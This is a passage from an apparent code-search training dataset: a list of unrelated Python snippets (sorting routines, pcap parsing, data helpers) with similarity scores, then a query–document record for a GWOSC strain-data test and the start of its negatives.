-e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def process_pcap(self):\n # Create Core Controller\n controller = Controller(self.args.input, self.args.extraTests, self.args.non_verbose, self.args.output,\n self.args.debug)\n\n if not self.args.skip:\n # Load PCAP statistics\n recalculate_intervals = None\n if self.args.recalculate_delete:\n recalculate_intervals = True\n elif self.args.recalculate_yes:\n recalculate_intervals = True\n self.args.recalculate = True\n elif self.args.recalculate_no:\n recalculate_intervals = False\n self.args.recalculate = True\n controller.load_pcap_statistics(self.args.export, self.args.recalculate, self.args.statistics,\n self.args.statistics_interval, self.args.recalculate_delete,\n recalculate_intervals)\n\n if self.args.list_intervals:\n controller.list_interval_statistics()\n\n # Create statistics plots\n if self.args.plot is not None:\n do_entropy = False\n if self.args.extraTests:\n do_entropy = True\n controller.create_statistics_plot(self.args.plot, do_entropy)\n\n # Check rng seed\n if not isinstance(self.args.rngSeed, list):\n self.args.rngSeed = [self.args.rngSeed]\n\n # Process attack(s) with given attack params\n if self.args.attack is not None:\n # If attack is present, load attack with params\n controller.process_attacks(self.args.attack, self.args.rngSeed, self.args.time, self.args.inject_empty)\n\n # Parameter -q without arguments was given -> go into query loop\n if self.args.query == [None]:\n controller.enter_query_mode()\n # Parameter -q with arguments was given -> process query\n elif self.args.query is not None:\n controller.process_db_queries(self.args.query, True)", "def test_for_different_input_sizes_asc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.asc(c)\n copy.sort()\n\n assert c == copy", "def _sort_records(self):\n self.records.sort(reverse=True, key=lambda record: record.timestamp)", "def mysorted(*args, **kwargs):\n _ = kwargs.pop(\"chunksize\", None)\n return sorted(*args, **kwargs)", "def sort(self, limit=0, offset=0, distance=False):\n if distance:\n self.features.sort(\n key=lambda x: (x['properties']['_distance_'],\n x['properties']['_collection_rank_']),\n )\n else:\n self.features.sort(\n key=lambda x: (-x['properties']['_score_'],\n x['properties']['_sort_tiebreaker_']),\n )\n\n if limit:\n self.features = self.features[offset:limit + offset]\n elif offset:\n self.features = self.features[offset:]\n\n self.offset = offset", "def reorder_examples(self):\n self.example_wise_shrink(Ordering, key=sort_key)", "def sort_vnet(model, option='traffic'): \n failed_dict = model.failed_dict\n vnet_info = model.get_vnet_info()\n vnets = model.vnets\n vnet_traffic = {}\n for vn in vnets:\n failed_id = failed_dict[vn.vnet_id]\n failed_node_traffic = vnet_info[vn.vnet_id]['traffic'][failed_id][1]\n vnet_traffic[vn] = round(failed_node_traffic, 5)\n sorted_vn = sorted(vnet_traffic.iteritems(), key=operator.itemgetter(1)) \n sorted_vn.reverse()\n return sorted_vn", "def __init__(self, pcap):\n self.pcap = pcap\n self.actions = []\n self._parse_pcap()", "def sortbatch(q_batch, a_batch, q_lens, a_lens):\n maxlen_q = max(q_lens)\n maxlen_a = max(a_lens)\n q=q_batch[:,:maxlen_q-1]\n a=a_batch[:,:maxlen_a-1]\n sorted_idx = torch.LongTensor(a_lens.numpy().argsort()[::-1].copy())\n return q[sorted_idx], a[sorted_idx], q_lens[sorted_idx], a_lens[sorted_idx]", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def sort_all(batch, lens):\n\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\n return sorted_all[2:], sorted_all[1]", "def tweet_sort(twitter_data, results, cmp):\r\n \r\n # Insertion sort\r\n for i in range(1, len(results)):\r\n current = results[i]\r\n position = i\r\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\r\n results[position] = results[position - 1]\r\n position = position - 1 \r\n results[position] = current", "def main(input, output, overwrite, port):\r\n\tpcap_filepath = pathlib.Path(input)\r\n\tif port is not None:\r\n\t\tcsv_filepath = convert_to_csv(pcap_filepath, overwrite, True, port)\r\n\telse:\r\n\t\tcsv_filepath = convert_to_csv(pcap_filepath, overwrite)\r\n\t\r\n\ttry:\r\n\t\tsrt_packets = extract_srt_packets(csv_filepath)\r\n\texcept (UnexpectedColumnsNumber, EmptyCSV, NoUDPPacketsFound, NoSRTPacketsFound) as error:\r\n\t\tprint(f'{error}')\r\n\t\treturn\r\n\t\t\r\n\tindex = SRTDataIndex(srt_packets)\r\n\tdf = srt_packets[index.data_pkts_org]\r\n\t(df['srt.timestamp'] / 1000000.0).to_csv(output, index=False, header=False)\r\n\t\r\n\t# TODO: Plotting the histogram of packets by 10 ms bins.\r\n\t# The code below is missing the end time in the arrange() function.\r\n\t#x = np.arange(0, 27, 0.01, dtype = float)\r\n\t#fig, axis = plt.subplots(figsize =(10, 5))\r\n\t#axis.hist((df['srt.timestamp'] / 1000000.0), bins = x)\r\n\t#plt.show()\r\n\r\n\treturn", "def test_sort():\n data = [\"filename_{}.py\".format(i) for i in range(200)]\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def bubble_sort(dataset):\n\t# start with array length and decrement each time \n\tarrayLen = len(dataset)\n\tbubbleIndex = len(dataset) - 1\n\twhile bubbleIndex != 0:\n\t\tarrayIndex = 0\n\t\twhile arrayIndex < arrayLen - 1:\n\t\t\tthisVal = dataset[arrayIndex]\n\t\t\tnextVal = dataset[arrayIndex + 1]\n\t\t\tif thisVal > nextVal:\n\t\t\t\tdataset[arrayIndex + 1] = thisVal\n\t\t\t\tdataset[arrayIndex] = nextVal\n\t\t\tarrayIndex += 1\n\t\tprint \"Current State:\", dataset\n\t\tbubbleIndex -= 1", "def sort_all(batch, lens):\r\n unsorted_all = [lens] + [range(len(lens))] + list(batch)\r\n sorted_all = [list(t) for t in zip(*sorted(zip(*unsorted_all), reverse=True))]\r\n return sorted_all[2:], sorted_all[1]", "def sort_bam(inbamfile,\n outbamfile,\n sort_order=\"coordinate\"):\n\n cmd_sort = \"java -Xmx6g -jar $NGS_PICARD/SortSam.jar \" \\\n \"INPUT=%s \" \\\n \"OUTPUT=%s \" \\\n \"SORT_ORDER=%s\" % (inbamfile,\n outbamfile,\n sort_order)\n return cmd_sort", "def sortData(unsortedList):\r\n # We will begin with the data from the bubble sort\r\n bubbleSortData = []\r\n bubbleSortOptData = []\r\n selectionSortData = []\r\n insertionSortData = []\r\n\r\n # The range of testing will begin at zero\r\n testRange = 0\r\n\r\n for i in range(len(unsortedList) + 1):\r\n bubbleSortCount = Sorts.bubbleSort(unsortedList[:testRange])\r\n bubbleSortData.append(bubbleSortCount)\r\n\r\n bubbleSortOptCount = Sorts.bubbleSortOpt(unsortedList[:testRange])\r\n bubbleSortOptData.append(bubbleSortOptCount)\r\n\r\n selectionSortCount = Sorts.selectionSort(unsortedList[:testRange])\r\n selectionSortData.append(selectionSortCount)\r\n\r\n insertionSortCount = Sorts.insertionSort(unsortedList[:testRange])\r\n insertionSortData.append(insertionSortCount)\r\n testRange += 1\r\n\r\n # Write the sort data to text file\r\n writeSortDataToText(bubbleSortData, bubbleSortOptData, selectionSortData, insertionSortData)", "def __init__(self, data, draw, speed):\n self.heap_sort(data, draw, speed)", "def _sort(self):\n self.population.sort()\n self.population.reverse()", "def sort(self, desc):\n self.__sortByIndex(0, desc)", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def tweet_sort(twitter_data, results, cmp):\n\n # Insertion sort\n for i in range(1, len(results)):\n current = results[i]\n position = i\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\n results[position] = results[position - 1]\n position = position - 1\n results[position] = current", "def test_benchmark_xsorted(partition_size, benchmark, benchmark_items_fixture):\n xsorted_ = xsorter(partition_size=partition_size)\n do_benchmark(benchmark_items_fixture, xsorted_, benchmark)", "def sort(self,desc):\n\tself.__sort(\"\",\"\",desc)", "def sort(self, key_func):\n pass", "def sort_list(self,list_):\r\n list_.sort()", "def test_list_flow_classifier_sort(self):\n resources = \"flow_classifiers\"\n cmd = fc.FlowClassifierList(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def sort_inventory(self, inventory_list): # dont use transactions here...as it is called within other transactions\n # unused will be deprecated\n batch_list = []\n new_inventory_list = []\n try:\n for i in inventory_list:\n if i.batch_number:\n batch_list.append(i.batch_number)\n batch_list.sort()\n for i in batch_list:\n for j in inventory_list:\n if j.batch_number == i:\n new_inventory_list.append(j)\n return new_inventory_list\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return new_inventory_list", "def sort_entries(entries: List[CapTableEntry], order_by: str, order_direction: str):\n if order_by == \"balance\":\n key = lambda entry: entry.balance\n elif order_by == \"name\":\n key = lambda entry: entry.name\n elif order_by == \"updated\":\n key = lambda entry: entry.updated_at\n elif order_by == \"address\":\n key = lambda entry: entry.address\n else:\n raise TypeError(\"Unknown sort order\")\n\n if order_direction == \"asc\":\n entries.sort(key=key)\n elif order_direction == \"desc\":\n entries.sort(key=key, reverse=True)\n else:\n raise TypeError(\"Unknown sort direction\")", "def sort(match, ser_if):\n if match:\n ser_if.write('m')\n else:\n ser_if.write('c')\n return check_response(ser_if)", "def sort(self, quant=None):\n if quant is None: # sort bei weight\n self.__sortlist = [key for key, values in sorted(self.__quantile.items(), key=lambda items: sum((10^quantille * count for quantille, count in enumerate(items[1].values()))))]\n elif isinstance(quant, int):\n self.__sortlist = [key for key, values in sorted(self.__quantile.items(), key=lambda items: items[1][quant])]", "def test_for_different_input_sizes_desc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.desc(c)\n copy.sort(reverse=True)\n\n assert c == copy", "def sort_by_length(self):\n target_lengths = list()\n\n for idx, label_path in enumerate(self.label_paths):\n key = label_path.split('/')[-1].split('.')[0]\n target_lengths.append(len(self.target_dict[key].split()))\n\n bundle = list(zip(target_lengths, self.audio_paths, self.label_paths, self.augment_flags))\n _, self.audio_paths, self.label_paths, self.augment_flags = zip(*sorted(bundle, reverse=True))\n\n del _", "def sort_collected_data():\n\n def is_from_valid_set(fn):\n return fn.find(\"validation\") != -1\n\n source_dir = \"data\"\n\n x_train_dir = os.path.join(SEG_DATA_FOLDER, \"train\")\n y_train_dir = os.path.join(SEG_DATA_FOLDER, \"train_label\")\n x_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val\")\n y_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val_label\")\n\n for direc in [x_train_dir, y_train_dir, x_valid_dir, y_valid_dir]:\n mkdir_if_not_exist(direc)\n\n images = [x for x in os.listdir(source_dir) if x.find(\"png\") >= 0]\n inputs = [x for x in images if x.find(\"label\") == -1]\n labels = [x for x in images if x.find(\"label\") != -1]\n\n train_x = [x for x in inputs if not is_from_valid_set(x)]\n valid_x = [x for x in inputs if is_from_valid_set(x)]\n train_y = [x for x in labels if not is_from_valid_set(x)]\n valid_y = [x for x in labels if is_from_valid_set(x)]\n\n for f in train_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_train_dir, f))\n\n for f in train_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_train_dir, f))\n\n for f in valid_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_valid_dir, f))\n\n for f in valid_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_valid_dir, f))", "def _sort_phot(self, verbose=False):\n if hasattr(self, \"data\") and hasattr(self, \"data_filters\"):\n ## This looks fugly.\n newkeys = np.array([i for i in self.data_filters.keys()])[np.argsort([self.data_filters[i].lambda_effective.value for i in self.data_filters])]\n\n sorted_data = OrderedDict()\n sorted_data_filters = OrderedDict()\n\n for newkey in newkeys:\n\n if verbose: print(newkey)\n\n sorted_data[newkey] = self.data[newkey]\n sorted_data_filters[newkey] = self.data_filters[newkey]\n\n self.data = sorted_data\n self.data_filters = sorted_data_filters\n\n else:\n warnings.warn(\"Doesn't seem to be any data here (empty self.data)\")\n pass", "def sorted_models(cls, model_dir, sort:str = 'step', desc:bool = True) -> List[Path]:\n paths = model_dir.glob('model_*.pkl')\n sorters = {\n 'test_score': cls._path_to_test_score,\n 'total_score': cls._path_to_total_score,\n 'step': cls._path_to_step_no\n }\n if sort not in sorters:\n raise Exception(f'Sort {sort} not supported. valid options: {sorters.keys()}')\n return sorted(paths, key=sorters[sort], reverse=desc)", "def sort(self, key: str):\n return self._select_interface(self._rc_sort, self._http_sort, key)", "def sort(self, *args, **kwargs):\n self._sequence.sort(*args, **kwargs)", "def sorting_urls(train_imgs, test_imgs, val_imgs):\n\n # Get the bad urls\n bad_urls = get_bad_urls()\n # Get Dev data-set\n dev_imgs = get_dev_entities_img_ids()\n\n real_train_imgs = []\n real_test_imgs = []\n real_val_imgs = []\n\n # Remove bad urls\n for img in train_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_train_imgs.append(img)\n\n for img in test_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_test_imgs.append(img)\n\n for img in val_imgs:\n if img.url in bad_urls:\n continue\n\n img_id = img.url.split(\"/\")[-1]\n img_id = int(img_id.split('.')[0])\n if img_id in dev_imgs and USE_DEV:\n continue\n real_val_imgs.append(img)\n\n logger.log(\"Debug printing after sorting- the number of train samples: {0}, the number of test samples: {1}, \"\n \"the number of validation samples: {2}\".format(len(real_train_imgs),\n len(real_test_imgs),\n len(real_val_imgs)))\n return real_train_imgs, real_test_imgs, real_val_imgs", "def test_sorting(sort=selection_sort, num_items=20, max_value=50):\n # TODO: Repeat until all items are in sorted order\n # TODO: Take first unsorted item\n # TODO: Insert it in sorted order in front of items", "def _sort_by_name(bam_fn):", "def test_pyt_batchsort_train(self):\n # Next, check that training works\n dt_and_preprocess = [\n ('train', False),\n ('train:stream', False),\n ('train', True)\n ]\n for dt, preprocess in dt_and_preprocess:\n defaults = parser_defaults.copy()\n defaults['datatype'] = dt\n defaults['pytorch_preprocess'] = preprocess\n defaults['pytorch_teacher_batch_sort'] = True\n defaults['batchsize'] = 32\n if preprocess:\n defaults['batch_sort_field'] = 'text_vec'\n str_output, _, _ = testing_utils.train_model(defaults)\n self.assertTrue(\n solved_task(str_output),\n 'Teacher could not teach seq2seq with batch sort '\n 'and args {} and output {}'\n .format((dt, preprocess), str_output)\n )", "def sort_results(self):\n pass", "def sort():\n return -1", "def _sort_by_duration(self) -> None:\n total_samples = len(self.paths)\n if total_samples == 0:\n return\n samples = zip(self.paths, self.durations, self.transcriptions)\n sorted_samples = sorted(samples, key=lambda sample: sample[1])\n self.paths, self.durations, self.transcriptions = [\n list(c) for c in zip(*sorted_samples)\n ]\n assert (\n total_samples\n == len(self.paths)\n == len(self.durations)\n == len(self.transcriptions)\n ), \"_sort_by_duration len mis-match\"", "def reversesort(self):\n ...", "def sort(self, *args, **kwargs) -> \"Actions\":\n self.actions.sort(*args, **kwargs)\n return self", "def sort_data(self):\n\n # zips the game_list and game_Scores, sorts the result by scores, and then puts them back.\n self.game_list, self.game_scores = zip(*sorted(zip(self.game_list, self.game_scores), key=lambda pair: pair[1]))", "def sort(*, list : Union[List[Any], ConduitVariable], reverse : bool = False) -> None:\n list.sort(key = None, reverse = reverse)", "def python_sort(a_list):\n \n start_time = time.time()\n\n a_list.sort()\n\n end_time = time.time()\n\n run_time = end_time - start_time\n\n return (run_time, a_list)", "def sort(self,cmp_iter_able,reverse = False):\n length = len(cmp_iter_able)\n h=1\n while h < length/3:\n h = 3*h + 1\n \n while h >= 1 :\n for i in range(h,length):\n j = i\n while j > 0:\n if self.compare(cmp_iter_able[j],cmp_iter_able[j-h],reverse = reverse):\n self.exch(cmp_iter_able,j,j-h)\n j -=h\n h = int(h/3)", "def test_sort_outputs_0a6a357e(self):\n outputs = bip69.get_outputs_from_rpc_json(self.tx_json_0a6a357e)\n bip69_outputs = bip69.sort_outputs(outputs)\n self.assertEqual(bip69_outputs[0], (('76a9144a5fba237213a062f6f57978f79'\n '6390bdcf8d01588ac'), 400057456))\n self.assertEqual(bip69_outputs[1], (('76a9145be32612930b8323add2212a4ec'\n '03c1562084f8488ac'), 40000000000))", "def sort(self, *args, **kargs):\n list.sort(self, *args, **kargs)\n self.emit('modified')", "def sortSample(self, key, ascending):\n try:\n self.sample[self.sample['masked'] == False].sort_values(by=key, ascending=ascending)\n except:\n pass", "def sort_probs(probs_list):\n return sorted(probs_list, key=lambda x: x[1])", "def sort(self, sort):\n\n self._sort = sort", "def sortByRecordNum(self, records, verbose=False, in_place=False):\n tmp = records # copy of records for sorting\n if (verbose):\n print \"[EVT] Sorting by record number\"\n\n swapped = True\n while swapped:\n swapped = False\n for i in xrange(len(tmp)-1):\n ni = tmp[i].getField(\"recordNumber\")\n nj = tmp[i+1].getField(\"recordNumber\")\n if ni > nj:\n t = tmp[i+1]\n tmp[i+1] = tmp[i]\n tmp[i] = t\n swapped = True\n return tmp", "def sortByTimeGenerated(self, records, verbose=False, in_place=False):\n tmp = records\n if (verbose):\n print \"[EVT] Sorting by time generated\"\n\n swapped = True\n while swapped:\n swapped = False\n for i in xrange(len(tmp)-1):\n ni = tmp[i].getField(\"timeGenerated\")\n nj = tmp[i+1].getField(\"timeGenerated\")\n if ni > nj:\n t = tmp[i+1]\n tmp[i+1] = tmp[i]\n tmp[i] = t\n swapped = True\n return tmp", "def sort(self, key: Callable):\n self.data.sort(key=key)", "def sort(self, key: Callable):\n self.data.sort(key=key)", "def sort_1(l):\n pass", "def sort_results(self, sort_option):\r\n self.model.sort_data(sort_option)", "def tensor_resort(inputs, tensor_order):\n pass", "def categorize_data(data, top_count):\n sorted_by_tcp = sorted(\n data, key=lambda x: x['TCP Utilization'], reverse=True\n )[0:top_count]\n sorted_by_udp = sorted(\n data, key=lambda x: x['UDP Utilization'], reverse=True\n )[0:top_count]\n\n print(f\"\\nTOP-{top_count} port flooders by TCP\")\n print(tabulate(sorted_by_tcp, headers='keys', tablefmt=\"psql\"))\n print(f\"\\nTOP-{top_count} port flooders by UDP\")\n print(tabulate(sorted_by_udp, headers='keys', tablefmt=\"psql\"))", "def sorting_alg(self, my_list):\n for i in range(len(my_list)):\n for j in range(i+1, len(my_list)):\n if my_list[i] > my_list[j]:\n my_list[i], my_list[j] = my_list[j], my_list[i]\n #print(my_list)\n #sleep(1)\n return my_list", "def bboxes_sort(classes, scores, bboxes, top_k = 400):\n# if priority_inside:\n# inside = (bboxes[:, 0] > margin) & (bboxes[:, 1] > margin) & \\\n# (bboxes[:, 2] < 1-margin) & (bboxes[:, 3] < 1-margin)\n# idxes = np.argsort(-scores)\n# inside = inside[idxes]\n# idxes = np.concatenate([idxes[inside], idxes[~inside]])\n idxes = np.argsort(-scores)\n classes = classes[idxes][:top_k]\n scores = scores[idxes][:top_k]\n bboxes = bboxes[idxes][:top_k]\n return classes, scores, bboxes", "def sort_unit_lst(self, attrname, lst2sort):\n comp = []\n for unit in lst2sort:\n importance = self._importance_rank(unit, attrname)\n comp.append((unit, importance))\n comp = sorted(comp, key= lambda x: x[1], reverse=True)\n\n return [x[0] for x in comp]", "def sort(self):\r\n\t\tif ScoreOpt.isGroupVassals():\r\n\t\t\tself._playerScores.sort(lambda x, y: cmp(x.sortKey(), y.sortKey()))\r\n\t\t\tself._playerScores.reverse()\r\n\t\tmaxPlayers = ScoreOpt.getMaxPlayers()\r\n\t\tif maxPlayers > 0 and len(self._playerScores) > maxPlayers:\r\n\t\t\tself._playerScores = self._playerScores[len(self._playerScores) - maxPlayers:]", "def sort(unsorted_bed_file_name, sorted_bed_file_name):\n array_call = ['sort', '-k', '1,1', '-k', '2,2n',\n unsorted_bed_file_name, '-o', sorted_bed_file_name]\n p = _handleExceptionAndCheckCall(array_call)\n return p", "def sort_bed_dir(input_beddir,output_beddir):\n print(\"processing .. sorting bed files \",input_beddir)\n if not os.path.exists(input_beddir):\n raise(\"input directory does not exist\")\n if not os.path.exists(output_beddir):\n os.makedirs(output_beddir)\n\n cmd = [\"bedtools\", \"sort\", \"-i\", \"${FILENAME}.bed\"]\n for file in glob.glob(os.path.join(input_beddir, '*bed')):\n file_name = os.path.basename(file).split('.')[0]\n output_filename = os.path.join(output_beddir, file_name+\"_sort.bed\")\n bedtool_obj = pybedtools.BedTool(file)\n bedtool_obj.sort().saveas(output_filename)\n # cmd[-1] = file\n # with open(output_filename, \"w\") as file:\n # subprocess.run(cmd, check=True, stdout=file)", "def ps_list(self,sort_by='cpu',**filters):\n import operator\n import numpy.distutils.proc as numpy_proc\n res = self.apply(numpy_proc.ps_list,())\n psl = reduce(operator.add,res)\n psl = numpy_proc.ps_sort(psl,sort_by,**filters)\n return psl", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)" ]
[ "0.55296206", "0.5489133", "0.5482073", "0.5391432", "0.53850245", "0.53489995", "0.5328854", "0.52847326", "0.5241572", "0.5189761", "0.5177634", "0.51613575", "0.51465315", "0.5137804", "0.5135673", "0.51097757", "0.51089555", "0.51009786", "0.5096934", "0.5095022", "0.5090213", "0.50829244", "0.50816697", "0.50816697", "0.5043453", "0.5042157", "0.5031161", "0.5017638", "0.49982575", "0.49934813", "0.49918067", "0.49906412", "0.4975226", "0.49486214", "0.49420223", "0.4940597", "0.49337935", "0.49175647", "0.49048865", "0.48996064", "0.4881592", "0.4879902", "0.4872204", "0.48709634", "0.4858807", "0.48569602", "0.48529425", "0.48529005", "0.48423338", "0.48400155", "0.4835978", "0.48350015", "0.48333716", "0.48305142", "0.4826351", "0.4816019", "0.48151052", "0.47837818", "0.47785738", "0.47670168", "0.47599232", "0.47595018", "0.47571123", "0.4754714", "0.47489417", "0.47413918", "0.4738749", "0.47360376", "0.47247815", "0.4722445", "0.47196788", "0.47187704", "0.47185072", "0.47157642", "0.47150943", "0.47125316", "0.47060183", "0.4697381", "0.46900454", "0.46861556", "0.46847007", "0.46796644", "0.46770075", "0.46702155", "0.46663293", "0.46544906", "0.4652947", "0.4652947", "0.46462625", "0.4641998", "0.46417567", "0.46376893", "0.46327725", "0.4629401", "0.46287772", "0.46272144", "0.4624132", "0.46230587", "0.4620519", "0.46168977" ]
0.7660257
0
test that the StrainData.fetch_open_frame works as expected
def test_fetch_open_frame(self): import requests pesummary_data = StrainData.fetch_open_frame( "GW190412", IFO="L1", duration=32, sampling_rate=4096., channel="L1:GWOSC-4KHZ_R1_STRAIN", format="hdf5" ) N = len(pesummary_data) np.testing.assert_almost_equal(N * pesummary_data.dt.value, 32.) np.testing.assert_almost_equal(1. / pesummary_data.dt.value, 4096.) assert pesummary_data.IFO == "L1" _data = requests.get( "https://www.gw-openscience.org/eventapi/html/GWTC-2/GW190412/v3/" "L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf" ) with open("L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf", "wb") as f: f.write(_data.content) data2 = TimeSeries.read( "L-L1_GWOSC_4KHZ_R1-1239082247-32.gwf", channel="L1:GWOSC-4KHZ_R1_STRAIN" ) np.testing.assert_almost_equal(pesummary_data.value, data2.value) np.testing.assert_almost_equal( pesummary_data.times.value, data2.times.value )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_fetch_open_data(self):\n args = [\"L1\", 1126259446, 1126259478]\n pesummary_data = StrainData.fetch_open_data(*args)\n gwpy_data = TimeSeries.fetch_open_data(*args)\n np.testing.assert_almost_equal(pesummary_data.value, gwpy_data.value)\n np.testing.assert_almost_equal(\n pesummary_data.times.value, gwpy_data.times.value\n )\n assert isinstance(pesummary_data.gwpy, TimeSeries)\n np.testing.assert_almost_equal(\n pesummary_data.gwpy.value, gwpy_data.value\n )\n np.testing.assert_almost_equal(\n pesummary_data.gwpy.times.value, gwpy_data.times.value\n )\n assert pesummary_data.IFO == \"L1\"\n assert list(pesummary_data.strain_dict.keys()) == [\"L1\"]\n np.testing.assert_almost_equal(\n pesummary_data.strain_dict[\"L1\"].value, gwpy_data.value\n )\n np.testing.assert_almost_equal(\n pesummary_data.strain_dict[\"L1\"].times.value, gwpy_data.times.value\n )", "def test_dataframe(self):\n\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data\"\n readerobject=requester.url_to_df(url)\n self.assertIsInstance(readerobject,pd.DataFrame)", "def test_fetch_traffic(self):\n assert isinstance(_tabular.fetch_traffic_data(), \n pd.DataFrame)", "def test_fetch_crime_sedf(self):\n assert isinstance(_vector.fetch_beach_access_data(f='arcgis'), \n pd.DataFrame)", "def test_get_df(mocker):\n spy_load_metadata = mocker.spy(MetaData, 'load_document')\n expected_df = pd.read_json('tests/odata/fixtures/records.json', orient='records')\n\n provider = ODataConnector(\n name='test',\n baseroute='http://services.odata.org/V4/Northwind/Northwind.svc/',\n auth={'type': 'basic', 'args': ['u', 'p']},\n )\n\n data_source = ODataDataSource(\n domain='test',\n name='test',\n entity='Orders',\n query={\n '$filter': \"ShipCountry eq 'France'\",\n '$orderby': 'Freight desc',\n '$skip': 50,\n '$top': 3,\n },\n )\n\n try:\n df = provider.get_df(data_source)\n sl = ['CustomerID', 'EmployeeID', 'Freight']\n assert df[sl].equals(expected_df[sl])\n except socket.error:\n pytest.skip('Could not connect to the standard example OData service.')\n\n assert spy_load_metadata.call_count == 1\n args, _ = spy_load_metadata.call_args\n assert args[0].url.endswith('/$metadata')\n\n provider.auth = None\n try:\n provider.get_df(data_source)\n except socket.error:\n pytest.skip('Could not connect to the standard example OData service.')", "def test_readSongData():\n\n # check type\n assert isinstance(song_df, pd.DataFrame)\n\n # check shape\n assert song_df.shape == (1972060, 8)", "def test_sector_perfomance_pandas_python2(self, mock_urlopen):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def supports_fetch_outside_dataloader(self):\r\n return True", "def test_fetch_crime(self):\n assert isinstance(_tabular.fetch_crime_data(), \n pd.DataFrame)", "def test_sector_perfomance_pandas_python3(self, mock_urlopen):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = 